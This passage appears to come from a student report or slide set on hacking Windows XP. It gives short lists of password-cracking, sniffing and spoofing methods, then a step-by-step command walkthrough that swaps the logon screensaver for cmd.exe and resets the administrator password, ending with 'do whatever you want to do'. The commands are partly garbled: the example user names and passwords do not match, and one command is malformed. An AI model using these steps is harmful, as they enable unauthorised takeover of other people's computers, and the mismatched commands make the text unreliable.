If the passwords are encrypted, the hacker could
use a password-cracking tool to decrypt them

Different password cracking method are :-


1.Dictionary Attack.
2.Brute force attack.
3.Sniffing.

SNIFFER
Sniffer is a program or tool that captures information over
computer network.Sniffer is of two types commercial and
underground .

COMMERCIAL SNIFFER can be used for :-


1. Fault analysis to detect problems in a network.
2. Performance analysis to detect network bottleneck.

UNDERGROUND SNIFFER can be used for :-


1. Confidential information such as e-mail message.
2. Financial data such as credit card numbers.

SPOOFING

There are many kinds of spoofing techniques which


are used by the people to hack the systems or to
get the critical information

Different type of spoofing:

(1) IP spoofing.
(2) Content spoofing.
(3) Caller ID spoofing.
(4) Email spoofing..

How to Hack or Crack a Windows XP
Administrator Password
.
1.Go to Start –> Run –> Type in CMD
2.You will get a command prompt. Enter these commands the
way it is given
3.cd\
4.cd\ windows\system32
5.mkdir temphack
6.copy logon.scr temphack\logon.scr
7.copy cmd.exe temphack\cmd.exe
8.del logon.scr
9.rename cmd.exe logon.scr
10.exit

 When this appears enter this command

net user password

 Example: If the admin user name is mahi and you want


change the password to rama Then type in the following
command

net user clazh pass

 This will chang the admin password to pass.


Thats it you have sucessfully hacked the Window XP
Administrator Password now you can Log in, using the
hacked Window XP Administrator Password and do
whatever you want to do. 9

CONCLUSION
Windows XP is one of the most widely used Operating
system in the world so it is important to learn the security
and loopholes. Here we learned the different tool and
techniques used for hacking.This knowledge is very much
helpful for administrator who maintain the system in an
organization. Using registry we can hack the Windows XP
locally. The access to explorer.exe is one of the greatest
loophole in windows through which we can exploit
Windows XP.Apart from this we learned about hacking
related to internet security. At last we learn about
prevention ,one should take to overcome this flaws.
